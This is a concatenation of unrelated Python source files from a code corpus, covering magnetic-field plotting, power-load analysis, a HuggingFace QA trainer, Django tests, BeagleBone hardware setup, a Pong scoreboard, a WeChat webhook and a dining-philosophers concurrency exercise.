numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom scipy.optimize import curve_fit\r\nfrom collections import Iterable\r\nfrom textfile_functions import *\r\n\r\n\r\n## Generating Axis Coordinates \r\nx = np.linspace(-2.5, 2.5, num = 51) \r\ny = np.linspace(-2.5, 2.5,num = 51) \r\nz = np.linspace(0, 20, num = 41)\r\n\r\npoints = []\r\nfor i in range(len(x)):\r\n for j in range(len(y)):\r\n for k in range(len(z)):\r\n points.append((x[i], y[j], z[k]))\r\n\r\n\r\n## Analyzing Data\r\ndef flatten_list(list,ignore_types=(str)): \r\n \"\"\"\r\n Takes a nested list of any dimension and recursively \"flattens\" it out \r\n into a 1 dimension list.\r\n \r\n @type list: List Object\r\n @type ignore_types= (str): Ignores all string inputs\r\n @rtype: None\r\n \"\"\"\r\n for item in list:\r\n if isinstance(item, Iterable) and not isinstance(item, ignore_types):\r\n yield from flatten_list(item,ignore_types=(str))\r\n else:\r\n yield item\r\n \r\n\r\ndef generator_to_list(gen):\r\n \"\"\"\r\n Converts an abstract generator object into a list containing the same \r\n elements as the generator.\r\n \r\n @type gen: Generator object\r\n @rtype: List[items]\r\n \"\"\"\r\n temp_list = []\r\n for item in gen:\r\n temp_list.append(item)\r\n return temp_list\r\n \r\ndef list_to_numpy_matrix(xdim, ydim, bvalues):\r\n \"\"\"\r\n Converts a list of b field values into a xdim*ydim numpy matrix.\r\n \r\n @type xdim: List\r\n @type ydimL List\r\n @type bvalues: List\r\n @rtype: numpy array\r\n \"\"\"\r\n dim_list = []\r\n for i in range(len(xdim)):\r\n b_list = []\r\n for j in range(len(ydim)):\r\n b_list.append(bvalues.pop(0))\r\n temp_np = np.array(b_list)\r\n dim_list.append(temp_np)\r\n return np.array(dim_list)\r\n \r\n#Put in the name of your text file here.\r\nmag_values = load_txtfile(\"bnorm_actual.txt\")\r\n \r\n\r\n# Creates nested list of b-field values. 
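# (Aside) A vectorized sketch of the same construction: if mag_values follows
# the ordering of the points list above (z varying fastest), a single reshape
# yields every per-z slice at once. The file layout is an assumption here, so
# the loop-based construction below is kept as the reference implementation.
vals = np.asarray(mag_values, dtype=float)
if vals.size == len(x) * len(y) * len(z):
    b_cube = vals.reshape(len(x), len(y), len(z))
    # b_cube[:, :, k] corresponds to list_to_numpy_matrix(x, y, bfields[k])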
\r\nbfields = [] #change to lst\r\nz_len = []\r\nfor i in range(len(z)):\r\n bfields.append([]) #change to lst\r\n z_len.append(i)\r\n\r\n#for some reason the mag values are being change when they're being popped\r\n#NEED TO FIX THIS!!!!\r\n# range value is len(mag_values) / len(z)\r\nloop_range = len(mag_values) // len(z)\r\nfor i in range(loop_range):\r\n for i in z_len:\r\n popped_value = mag_values.pop(0)\r\n bfields[i].append(popped_value)\r\n\r\n\r\nplz = list_to_numpy_matrix(x, y, bfields[0])\r\nplz2 = list_to_numpy_matrix(x, y, bfields[20])\r\nplz3 = list_to_numpy_matrix(x, y, bfields[40])\r\n\r\n \r\n## Plotting Figures\r\n# When the meshgrid is symmetric, ie size(x) = size(y), they can not all be named X,Y,Z\r\n# for each meshgrid, this the names are written to be cyclic and contain the dimensions of the grid\r\n\r\nXY, YX = np.meshgrid(x, y,indexing='ij', sparse=True)\r\nXZ, ZX = np.meshgrid(x, z,indexing='ij', sparse=True)\r\nYZ, ZY = np.meshgrid(y, z,indexing='ij', sparse=True)\r\nXYZ,YZX,ZXY = np.meshgrid(x,y,z,indexing='ij', sparse=True)\r\n\r\nfig = plt.figure(\"Z = 0\")\r\nax = fig.add_subplot(111, projection='3d')\r\nax.plot_surface(XY, YX, plz,cmap='coolwarm')\r\nax.set_title('surface')\r\nax.set_xlabel(\"x [m]\")\r\nax.set_ylabel(\"y [m]\")\r\nax.set_zlabel(\"|B| [T]\")\r\n\r\nfig = plt.figure(\"Z = 10\")\r\nax = fig.add_subplot(111, projection='3d')\r\nax.plot_surface(XY, YX, plz2,cmap='coolwarm')\r\nax.set_title('surface')\r\nax.set_xlabel(\"x [m]\")\r\nax.set_ylabel(\"y [m]\")\r\nax.set_zlabel(\"|B| [T]\")\r\n\r\nfig = plt.figure(\"Z = 20\")\r\nax = fig.add_subplot(111, projection='3d')\r\nax.plot_surface(XY, YX, plz3,cmap='coolwarm')\r\nax.set_title('surface')\r\nax.set_xlabel(\"x [m]\")\r\nax.set_ylabel(\"y [m]\")\r\nax.set_zlabel(\"|B| [T]\")\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","sub_path":"Molecular_beam_slowing/Code/Magnetic Field Plot/bfield_surfaceplot.py","file_name":"bfield_surfaceplot.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"41410728","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 23 08:02:25 2021\n\n@author: patrickwickersham\n\"\"\"\n\nimport pandas as pd\n\n\nRTD = pd.read_csv(\"OASIS_Real_Time_Dispatch_Actual_Load_2021.csv\")\n\n# creates datetime dtype column RTD['date'] AND callable columns \n#for year,month,day,hour,and minute\n\ndate = pd.to_datetime(RTD['RTD End Time Stamp'])\n#year = date.dt.year\n#month = date.dt.month\n#day = date.dt.day\n#hour = date.dt.hour\n#minute = date.dt.minute\n#second = date.dt.second\n#RTD['PTID'] = RTD['Zone PTID']\n#RTD['rtd_load'] = RTD['RTD Actual Load']\nRTD['date'] = date\n#RTD['second'] = second\n#RTD['minute'] = minute\n#RTD['hour'] = hour\n#RTD['day'] = day\n#RTD['month'] = month\n#RTD['year'] = year\n\nRTD_2020_april = RTD.pivot(index='date',\n columns='Zone Name',\n values='RTD Actual Load')\n\n\n#%% add a Total column\nRTD_2020_april['Total'] = RTD_2020_april.sum(axis=1)\n\n\n#%% compute ramp rate\n\n\nramprate_2020_april = RTD_2020_april.diff()\n\n","sub_path":"april_past_load.py","file_name":"april_past_load.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433298025","text":"# levantamento dos mouses\n# Declaração de variáveis\nquantidade_mouses = 0\nnecessita_esfera = 0\nnecessita_limpeza = 0\nnecessita_cabo = 0\nquebrado = 0\n# Entrada de dados\nidentificacao 
= int(input(\"Digite o id do mouse: \"))\nwhile identificacao != 0:\n print(\"Identifique o defeito: \")\n print(\"1 - Esfera\")\n print(\"2 - Limpeza\")\n print(\"3 - Cabo\")\n print(\"4 - Quebrado\")\n defeito = int(input(\"Digite o número do defeito: \"))\n if defeito == 1:\n necessita_esfera += 1\n elif defeito == 2:\n necessita_limpeza += 1\n elif defeito == 3:\n necessita_cabo += 1\n elif defeito == 4:\n quebrado += 1\n quantidade_mouses += 1\n identificacao = int(input(\"Digite o id do mouse: \"))\np1 = necessita_esfera / quantidade_mouses * 100\np2 = necessita_limpeza / quantidade_mouses * 100\np3 = necessita_cabo / quantidade_mouses * 100\np4 = quebrado / quantidade_mouses * 100\nprint(\"Situação Quantidade Percentual\")\nprint(f\"1)Troca de Esfera {necessita_esfera} {p1:.2f}%\")\nprint(f\"2)Necessita Limpeza {necessita_limpeza} {p2:.2f}%\")\nprint(f\"3)Troca de Cabo {necessita_cabo} {p3:.2f}%\")\nprint(f\"4)Quebrado {quebrado} {p4:.2f}%\")\n\n","sub_path":"Python_Logics/s7_ex7.py","file_name":"s7_ex7.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"251989785","text":"import time\nimport math\nfrom typing import Optional, List, Dict, Callable\n\nfrom transformers import (\n is_datasets_available,\n is_torch_tpu_available,\n)\nfrom transformers.trainer_utils import (\n PredictionOutput,\n speed_metrics,\n denumpify_detensorize,\n)\nfrom transformers.debug_utils import DebugOption\n\nfrom .base import Seq2SeqBaseTrainer\n\n\nif is_datasets_available():\n import datasets\n\nif is_torch_tpu_available():\n import torch_xla.core.xla_model as xm\n import torch_xla.debug.metrics as met\n\n\nclass QuestionAnsweringSeq2SeqTrainer(Seq2SeqBaseTrainer):\n\n def __init__(\n self,\n *args,\n eval_examples: datasets.Dataset = None,\n post_process_function: Callable = None,\n **kwargs\n ):\n \"\"\" QA Trainer for Seq2Seq(Generative) models\n\n Args:\n eval_examples (datasets.Dataset, optional): Examples for evaluation.\n post_process_function (Callable, optional): Post process function for model outputs.\n \"\"\"\n\n super().__init__(*args, **kwargs)\n self.eval_examples = eval_examples\n self.post_process_function = post_process_function\n\n def evaluate(\n self,\n eval_dataset: Optional[datasets.Dataset] = None,\n eval_examples: Optional[datasets.Dataset] = None,\n ignore_keys: Optional[List[str]] = None,\n metric_key_prefix: str = \"eval\",\n mode: str = \"evaluate\",\n max_length: Optional[int] = None,\n num_beams: Optional[int] = None,\n ) -> Dict[str, float]:\n \"\"\" Run evaluation and returns metrics.\n\n The calling script will be responsible for providing a method to compute metrics, as they are task-dependent\n (pass it to the init :obj:`compute_metrics` argument).\n\n You can also subclass and override this method to inject custom behavior.\n\n Args:\n eval_dataset (:obj:`Dataset`, `optional`):\n Pass a dataset if you wish to override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`,\n columns not accepted by the ``model.forward()`` method are automatically removed. 
It must implement the\n :obj:`__len__` method.\n eval_examples (Optional[datasets.Dataset], optional): \n Origin eval datasets for post processing.\n ignore_keys (:obj:`List[str]`, `optional`):\n A list of keys in the output of your model (if it is a dictionary) that should be ignored when\n gathering predictions.\n metric_key_prefix (:obj:`str`, `optional`, defaults to :obj:`\"eval\"`):\n An optional prefix to be used as the metrics key prefix. For example the metrics \"bleu\" will be named\n \"eval_bleu\" if the prefix is ``\"eval\"`` (default)\n mode (str, optional): \n \"evaluate\" or \"predict\" mode for post processing function.\n max_length (:obj:`int`, `optional`):\n The maximum target length to use when predicting with the generate method.\n num_beams (:obj:`int`, `optional`):\n Number of beams for beam search that will be used when predicting with the generate method. 1 means no\n beam search.\n\n Returns:\n A dictionary containing the evaluation loss and the potential metrics computed from the predictions. The\n dictionary also contains the epoch number which comes from the training state.\n \"\"\"\n\n self._max_length = max_length if max_length is not None else self.args.generation_max_length\n self._num_beams = num_beams if num_beams is not None else self.args.generation_num_beams\n # memory metrics - must set up as early as possible\n self._memory_tracker.start()\n eval_dataset = self.eval_dataset if eval_dataset is None else eval_dataset\n eval_dataloader = self.get_eval_dataloader(eval_dataset)\n start_time = time.time()\n eval_examples = self.eval_examples if eval_examples is None else eval_examples\n # 일시적으로 metric computation를 불가능하게 한 상태이며, 해당 코드에서는 loop 내에서 metric 계산을 수행합니다.\n compute_metrics = self.compute_metrics\n self.compute_metrics = None\n eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop\n try:\n output = eval_loop(\n eval_dataloader,\n description=\"Evaluation\",\n # metric이 없으면 예측값을 모으는 이유가 없으므로 아래의 코드를 따르게 됩니다.\n prediction_loss_only=True if compute_metrics is None else None,\n ignore_keys=ignore_keys,\n metric_key_prefix=metric_key_prefix,\n )\n finally:\n self.compute_metrics = compute_metrics\n\n if isinstance(eval_dataset, datasets.Dataset):\n eval_dataset.set_format(\n type=eval_dataset.format[\"type\"],\n columns=list(eval_dataset.features.keys()),\n )\n\n if self.post_process_function is not None and self.compute_metrics is not None:\n eval_preds = self.post_process_function(\n examples=eval_examples,\n predictions=output.predictions,\n training_args=self.args,\n tokenizer=self.tokenizer,\n )\n metrics = self.compute_metrics(eval_preds)\n\n # To be JSON-serializable, we need to remove numpy types or zero-d tensors\n metrics = denumpify_detensorize(metrics)\n\n # Prefix all keys with metric_key_prefix + '_'\n for key in list(metrics.keys()):\n if not key.startswith(f\"{metric_key_prefix}_\"):\n metrics[f\"{metric_key_prefix}_{key}\"] = metrics.pop(key)\n\n total_batch_size = self.args.eval_batch_size * self.args.world_size\n metrics.update(\n speed_metrics(\n metric_key_prefix,\n start_time,\n num_samples=output.num_samples,\n num_steps=math.ceil(output.num_samples / total_batch_size),\n )\n )\n self.log(metrics)\n else:\n metrics = {}\n\n if DebugOption.TPU_METRICS_DEBUG in self.args.debug:\n # tpu-comment: PyTorch/XLA에 대한 Logging debug metrics (compile, execute times, ops, etc.)\n xm.master_print(met.metrics_report())\n\n self.control = self.callback_handler.on_evaluate(\n self.args, self.state, 
self.control, metrics\n )\n\n self._memory_tracker.stop_and_update_metrics(metrics)\n\n return metrics\n\n def predict(\n self,\n test_dataset: datasets.Dataset,\n test_examples: datasets.Dataset,\n ignore_keys: Optional[List[str]] = None,\n metric_key_prefix: str = \"test\",\n mode: str = \"test\",\n max_length: Optional[int] = None,\n num_beams: Optional[int] = None,\n ) -> PredictionOutput:\n \"\"\"\n Run prediction and returns predictions and potential metrics.\n\n Depending on the dataset and your use case, your test dataset may contain labels. In that case, this method\n will also return metrics, like in :obj:`evaluate()`.\n\n Args:\n test_dataset (:obj:`Dataset`):\n Dataset to run the predictions on. If it is an :obj:`datasets.Dataset`, columns not accepted by the\n ``model.forward()`` method are automatically removed. Has to implement the method :obj:`__len__`\n test_examples (datasets.Dataset): \n Origin test datasets for post processing.\n ignore_keys (:obj:`List[str]`, `optional`):\n A list of keys in the output of your model (if it is a dictionary) that should be ignored when\n gathering predictions.\n metric_key_prefix (:obj:`str`, `optional`, defaults to :obj:`\"eval\"`):\n An optional prefix to be used as the metrics key prefix. For example the metrics \"bleu\" will be named\n \"eval_bleu\" if the prefix is ``\"eval\"`` (default)\n mode (str, optional): \n \"evaluate\" or \"predict\" mode for post processing function.\n max_length (:obj:`int`, `optional`):\n The maximum target length to use when predicting with the generate method.\n num_beams (:obj:`int`, `optional`):\n Number of beams for beam search that will be used when predicting with the generate method. 1 means no\n beam search.\n\n .. note::\n\n If your predictions or labels have different sequence lengths (for instance because you're doing dynamic\n padding in a token classification task) the predictions will be padded (on the right) to allow for\n concatenation into one array. 
The padding index is -100.\n\n Returns: `NamedTuple` A namedtuple with the following keys:\n\n - predictions (:obj:`np.ndarray`): The predictions on :obj:`test_dataset`.\n - label_ids (:obj:`np.ndarray`, `optional`): The labels (if the dataset contained some).\n - metrics (:obj:`Dict[str, float]`, `optional`): The potential dictionary of metrics (if the dataset\n contained labels).\n \"\"\"\n\n self._max_length = max_length if max_length is not None else self.args.generation_max_length\n self._num_beams = num_beams if num_beams is not None else self.args.generation_num_beams\n # memory metrics - must set up as early as possible\n self._memory_tracker.start()\n\n test_dataloader = self.get_test_dataloader(test_dataset)\n start_time = time.time()\n\n # 일시적으로 metric computation를 불가능하게 한 상태이며, 해당 코드에서는 loop 내에서 metric 계산을 수행합니다.\n # evaluate 함수와 동일하게 구성되어있습니다\n compute_metrics = self.compute_metrics\n self.compute_metrics = None\n eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop\n try:\n output = eval_loop(\n test_dataloader,\n description=\"Prediction\",\n ignore_keys=ignore_keys,\n metric_key_prefix=metric_key_prefix,\n )\n finally:\n self.compute_metrics = compute_metrics\n\n if self.post_process_function is None or self.compute_metrics is None:\n return output\n\n if isinstance(test_dataset, datasets.Dataset):\n test_dataset.set_format(\n type=test_dataset.format[\"type\"],\n columns=list(test_dataset.features.keys()),\n )\n\n predictions = self.post_process_function(\n examples=test_examples,\n predictions=output.predictions,\n training_args=self.args,\n tokenizer=self.tokenizer,\n )\n\n # self._memory_tracker.stop_and_update_metrics(output.metrics)\n\n return predictions\n","sub_path":"solution/reader/trainers/seq2seq_qa.py","file_name":"seq2seq_qa.py","file_ext":"py","file_size_in_byte":11133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"257715495","text":"# Euclidean distance between two sets of points\t\n# realisation with loops\ndef dist_loop(training, test):\n \n n1, d = training.shape\n n2, d1 = test.shape\n \n assert n1 != 0, 'Training set is empty'\n assert n2 != 0, 'Test set is empty'\n assert d==d1, 'Images in training and test sets have different size'\n\n tstart = time.time()\n \n dist = np.zeros((n1,n2), dtype = np.float32)\n \n for i in range(0,n1):\n for j in range(0,n2):\n diff = training[i,:]-test[j,:]\n dist[i,j] = np.sum(np.square(diff), axis=0)\n \n dist = np.sqrt(dist)\n tstop = time.time()\n \n return dist, tstop-tstart\n# end dist_loops","sub_path":"MachineLeraning/Exercises/ex01/text/dist_loop.py","file_name":"dist_loop.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87806992","text":"from nose.tools import eq_, ok_\n\nfrom funfactory.urlresolvers import reverse\n\nfrom airmozilla.main.models import Participant\nfrom .base import ManageTestCase\n\n\nclass TestParticipants(ManageTestCase):\n def test_participant_pages(self):\n \"\"\"Participants pagination always returns valid pages.\"\"\"\n response = self.client.get(reverse('manage:participants'))\n eq_(response.status_code, 200)\n response = self.client.get(reverse('manage:participants'),\n {'page': 5000})\n eq_(response.status_code, 200)\n\n def test_participant_find(self):\n \"\"\"Search filters participants; returns all for bad search.\"\"\"\n response_ok = self.client.post(\n 
reverse('manage:participants'),\n {\n 'name': 'Tim'\n }\n )\n eq_(response_ok.status_code, 200)\n ok_(response_ok.content.find('Tim') >= 0)\n response_fail = self.client.post(\n reverse('manage:participants'),\n {\n 'name': 'Lincoln'\n }\n )\n eq_(response_fail.status_code, 200)\n ok_(response_fail.content.find('Tim') >= 0)\n\n def test_participant_edit(self):\n \"\"\"Participant edit page responds OK; bad form results in failure;\n submission induces a change.\n \"\"\"\n participant = Participant.objects.get(name='Tim Mickel')\n response = self.client.get(reverse('manage:participant_edit',\n kwargs={'id': participant.id}))\n eq_(response.status_code, 200)\n response_ok = self.client.post(\n reverse('manage:participant_edit', kwargs={'id': participant.id}),\n {\n 'name': 'George Washington',\n 'email': 'george@whitehouse.gov',\n 'role': Participant.ROLE_PRINCIPAL_PRESENTER,\n 'cleared': Participant.CLEARED_YES\n }\n )\n self.assertRedirects(response_ok, reverse('manage:participants'))\n participant_george = Participant.objects.get(id=participant.id)\n eq_(participant_george.name, 'George Washington')\n response_fail = self.client.post(\n reverse('manage:participant_edit', kwargs={'id': participant.id}),\n {\n 'name': 'George Washington',\n 'email': 'bademail'\n }\n )\n eq_(response_fail.status_code, 200)\n\n def test_participant_email(self):\n \"\"\"Participant email page generates a token, redirects properly.\"\"\"\n participant = Participant.objects.get(name='Tim Mickel')\n participant.clear_token = ''\n participant.save()\n url = reverse('manage:participant_email',\n kwargs={'id': participant.id})\n response = self.client.get(url)\n eq_(response.status_code, 200)\n participant = Participant.objects.get(name='Tim Mickel')\n ok_(participant.clear_token)\n response_redirect = self.client.post(url)\n self.assertRedirects(response_redirect, reverse('manage:participants'))\n\n def test_participant_new(self):\n \"\"\"New participant page responds OK and form works as expected.\"\"\"\n response = self.client.get(reverse('manage:participant_new'))\n eq_(response.status_code, 200)\n with open('airmozilla/manage/tests/firefox.png') as fp:\n response_ok = self.client.post(\n reverse('manage:participant_new'),\n {\n 'name': 'Mozilla Firefox',\n 'slug': 'mozilla-firefox',\n 'photo': fp,\n 'email': 'mozilla@mozilla.com',\n 'role': Participant.ROLE_PRINCIPAL_PRESENTER,\n 'cleared': Participant.CLEARED_NO\n }\n )\n self.assertRedirects(response_ok, reverse('manage:participants'))\n participant = Participant.objects.get(name='Mozilla Firefox')\n eq_(participant.email, 'mozilla@mozilla.com')\n eq_(participant.creator, self.user)\n\n def test_participant_remove(self):\n participant = Participant.objects.get(name='Tim Mickel')\n self._delete_test(participant, 'manage:participant_remove',\n 'manage:participants')\n","sub_path":"airmozilla/manage/tests/views/test_participants.py","file_name":"test_participants.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"407746690","text":"'''\nCreated on Dec 14, 2015\n\n@author: Shannon Litwin\n'''\n\n\nimport Adafruit_BBIO.ADC as ADC\nimport Adafruit_BBIO.GPIO as GPIO\nfrom Adafruit_I2C import Adafruit_I2C as I2C\nimport Adafruit_BBIO.PWM as PWM\nfrom smbus import SMBus\nimport time\n\ndef initialize_motors():\n freq = 50\n duty = 0\n polarity = 1\n \n leftForward = \"P8_46\"\n leftBackward = \"P8_45\"\n rightForward = \"P9_14\"\n rightBackward = \"P9_16\"\n \n 
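    # Each motor presumably gets a forward/backward PWM pair (H-bridge style);
    # every channel starts at 0% duty, so the motors stay stopped until a
    # caller raises the duty cycle.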
PWM.start(leftForward, duty, freq, polarity)\n PWM.start(leftBackward, duty, freq, polarity)\n PWM.start(rightForward, duty, freq, polarity)\n PWM.start(rightBackward, duty, freq, polarity)\n\n######################################################################\n\n\ndef initialize_LED(): \n greenLight = \"P8_27\"\n blueLight = \"P8_28\"\n redLight = \"P8_29\"\n \n GPIO.setup(greenLight, GPIO.OUT)\n GPIO.setup(blueLight, GPIO.OUT)\n GPIO.setup(redLight, GPIO.OUT)\n\n######################################################################\n\ndef initialize_ADC_sensors():\n ADC.setup()\n######################################################################\n\ndef cleanup_all():\n GPIO.cleanup()\n PWM.cleanup()\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","sub_path":"PythonLibraries/Py_Startup_Funcs.py","file_name":"Py_Startup_Funcs.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"456489114","text":"from turtle import Turtle\r\nALIGNMENT = \"center\"\r\nFONT = (\"Courier\", 60, \"normal\")\r\nY = 200\r\nLEFT_X = -100\r\nRIGHT_X = 100\r\n\r\n\r\nclass Scoreboard(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.penup()\r\n self.color(\"white\")\r\n self.hideturtle()\r\n self.l_score = 0\r\n self.r_score = 0\r\n self.update_scoreboard()\r\n\r\n def update_scoreboard(self):\r\n self.clear()\r\n self.goto(LEFT_X, Y)\r\n self.write(f\"{self.l_score}\", align=ALIGNMENT, font=FONT)\r\n self.goto(RIGHT_X, Y)\r\n self.write(f\"{self.r_score}\", align=ALIGNMENT, font=FONT)\r\n\r\n def l_point(self):\r\n self.l_score += 1\r\n self.update_scoreboard()\r\n\r\n def r_point(self):\r\n self.r_score += 1\r\n self.update_scoreboard()\r\n\r\n","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"23129000","text":"import hashlib\nimport web\nimport lxml\nimport time\nimport urllib2,json\nimport os\nimport sys\nsys.path.append('handler')\nsys.path.append('handler/normal_handler')\nimport text_handler\n# import link_handler\n# import video_handler\n# import image_handler\n# import location_handler\n# import short_video_handler\n# import voice_recognized_handler\n# import voice_unrecognized_handler\n# sys.path.append('handler/event_handler')\n# import sub_event_handler\n# import click_event_handler\n# import unsub_event_handler\n# import location_event_handler\n# import scan_after_sub_event_handler\n# import scan_before_sub_event_handler\n\nfrom lxml import etree\n\nclass WeixinRequest:\n def __init__(self):\n self.app_root = os.path.dirname(__file__)\n self.templates_root = os.path.join(self.app_root, 'templates')\n self.render = web.template.render(self.templates_root)\n \n #Check Token to initialize server resource\n def GET(self):\n data = web.input()\n signature = data.signature\n timestamp = data.timestamp\n nonce = data.nonce\n echostr = data.echostr\n token = 'leopenweixin'\n list = [token,timestamp,nonce]\n list.sort()\n sha1 = hashlib.sha1()\n map(sha1.update,list)\n hashcode = sha1.hexdigest()\n \n if hashcode == signature:\n return echostr\n \n #check POST parameters to decide which function will be executed\n def POST(self):\n str_xml = web.data()\n xml = etree.fromstring(str_xml)#analyze xml file\n msg_type = xml.find('MsgType').text\n if msg_type == 'text':\n text_hanlder_obj = text_handler.TextHandler(xml)#it's all ok until here\n 
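            # prefix_handler() builds the reply; ResponseForWeixin then
            # dispatches on response.type. Note the dispatcher calls
            # response_text() while the method below is spelled reponse_text,
            # so the text branch fails as written.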
response = text_hanlder_obj.prefix_handler()\n response = ResponseForWeixin(response, self)\n response.response_handler()\n\n # elif msgType == 'image':\n # image()\n # elif msgType == 'voice':\n # voice()\n # elif msgType == 'video':\n # video()\n # elif msgType == 'shortvideo':\n # shortvideo()\n # elif msgType == 'location':\n # location()\n # elif msgType == 'link':\n # link()\n # elif msgType == 'event':\n # event()\n\nclass ResponseForWeixin:\n def __init__(self, response, post_object):\n self.response = response\n self.post_object = post_object\n\n #determing which response function would be excuted by response type\n def response_handler(self):\n if self.response.type == 'text':\n response_text()\n # elif self.response.type == '':\n # pass\n # else:\n # pass\n\n #define response functions by different templates\n def reponse_text(self):\n self.post_object.render.reply_text(self.response.from_user,self.response.to_user,int(time.time()),self.response.content)\n","sub_path":"weixin_request.py","file_name":"weixin_request.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"99674748","text":"\"\"\"\nAn example of the deadlock-philosopher problem we talked about. Needs fixing!\n\n9/23/2019 ASR\nImplement a 'Waiter' entity to manage the philosophers.\nThe rules for waiter-philosopher interaction shall be:\n(1) philosophers must queue up to ask the waiter's permission before picking up a fork\n(2) the waiter only allows a philosopher to pick up both forks or none at all (and return to back of the line).\n(3) philosophers can put down forks without the waiter's permission\n\"\"\"\n\n# For the purpose of this example, a fork will literally be a threading.Lock\n# object but thematically it makes more sense in context of what we talked about\n# to keep calling it a fork :D\nfrom threading import Lock as Fork\nfrom threading import Thread\nfrom time import sleep, time\n\nclass Plate:\n def __init__(self, seats_per_table, meals, meal_consumption_time, left_fork=None, right_fork=None,):\n self.left = left_fork\n self.right = right_fork\n self.meals_eaten = 0\n\n self.seats_per_table = seats_per_table\n self.meals = meals\n self.meal_consumption_time = meal_consumption_time\n\n\n def eat(self, meal_consumption_time):\n sleep(meal_consumption_time)\n self.meals_eaten += 1\n\nclass Philosoper(Thread):\n def __init__(self, number, waiter=None):\n super(Philosoper, self).__init__()\n self.number = number\n self.plate = None\n self.waiter = waiter\n\n def run(self):\n meals = self.plate.meals\n meal_consumption_time = self.plate.meal_consumption_time\n seats_per_table = self.plate.seats_per_table\n\n for meal in range(meals):\n # Get index for left fork and right fork before asking the waiter\n # eater index goes with fork index and index - 1 (see Table class setting)\n n = self.number\n fork1_index = n\n if n == 0:\n fork2_index = seats_per_table - 1 # wrap around!\n else:\n fork2_index = n - 1\n\n # Ask Jeeves\n while True:\n with self.waiter._attention:\n can_i = self.waiter.ask(fork1_index, fork2_index)\n if can_i == 'yes':\n# print(f\"philo {self.number} got a {can_i}. 
He stops asking, grabs the forks, and digs in...\")\n self.plate.left.acquire()\n self.plate.right.acquire()\n break\n else:\n# print(f\"philo {self.number} got a {can_i} and asks again!...\")\n continue\n # Dig in.\n self.plate.eat(meal_consumption_time)\n # put down the forks when finished eating\n self.plate.left.release()\n self.plate.right.release()\n # Update Jeeves' list; the forks are available. We don't need to wait for his attention here.\n self.waiter.markForkAvailable(fork1_index, fork2_index)\n\nclass Waiter:\n def __init__(self, seats, forks, plates):\n # Upon hire, the waiter is given a list of seats, forks, and plates to track.\n # The waiter keeps a list of which forks are available. 0 for not-in-use. 1 for in-use.\n self._seats = seats\n self._forks = forks\n self._plates = plates\n\n # Endow Jeeves with singular attention (as a lock or \"fork\")\n self._attention = Fork()\n\n def __enter__(self):\n self._attention.acquire()\n\n def __exit__(self):\n self._attention.release()\n\n def makeForkStatusList(self):\n # initially set all forks status to 0, \"not in use\"\n # it lines up against indices for Forks list\n self._forkStatus = [\n [fork, 0] for fork in range(len(self._forks))\n ]\n\n def markForkInUse(self, fork1_index, fork2_index):\n self._forkStatus[fork1_index][1] = 1\n self._forkStatus[fork2_index][1] = 1\n# print(f\"forks {fork1_index} and {fork2_index} now IN USE.\")\n\n def markForkAvailable(self, fork1_index, fork2_index):\n self._forkStatus[fork1_index][1] = 0\n self._forkStatus[fork2_index][1] = 0\n# print(f\"forks {fork1_index} and {fork2_index} now AVAIL.\")\n\n\n def ask(self, fork1_index, fork2_index):\n # Philosopher asks the waiter to pick up his forks, passing in the fork indices.\n # Waiter checks his list.\n # If fork1 and fork2 are available, he gives this philosopher 'yes' and changes these forks status to 1, \"in use\".\n # If they aren't both available, he gives this philosopher a 'no'.\n if self._forkStatus[fork1_index][1] == 0 and self._forkStatus[fork2_index][1] == 0:\n # check out the forks to this philosopher\n self.markForkInUse(fork1_index, fork2_index)\n return 'yes'\n else:\n # give a 'no'\n return 'no'\n\nclass Table:\n def __init__(self, seats, meals, meal_consumption_time):\n\n self.meals = meals\n self.meal_consumption_time = meal_consumption_time\n self.seats_per_table = seats\n\n # Create seats with philosophers sitting in them\n self._seats = [Philosoper(n) for n in range(seats)]\n # Make a left fork for each seat (ultimately, the right fork will be the\n # left fork of the previous seat)\n self._forks = [\n Fork()\n for seat in self._seats\n ]\n # Create the plates\n self._plates = [\n Plate(self.seats_per_table, self.meals, self.meal_consumption_time)\n for seat in self._seats\n ]\n\n # Assign the forks to the plates\n previous_left_fork = None\n for plate, fork in zip(self._plates, self._forks):\n plate.left = fork\n plate.right = previous_left_fork\n previous_left_fork = fork\n\n # Don't forget to wrap around!\n self._plates[0].right = previous_left_fork\n\n # Hire the waiter *ahem* Jeeves, giving him the list of seats, forks, and plates\n Jeeves = Waiter(self._seats, self._forks, self._plates)\n Jeeves.makeForkStatusList() # initially all forks are available\n # assign Jeeves to the table\n self._waiter = Jeeves\n\n # Let the philosophers know Jeeves is the waiter.\n for philo in self._seats:\n philo.waiter = Jeeves\n\n def go(self):\n start_time = time()\n # Give everyone a plate and dig in\n for eater, plate in 
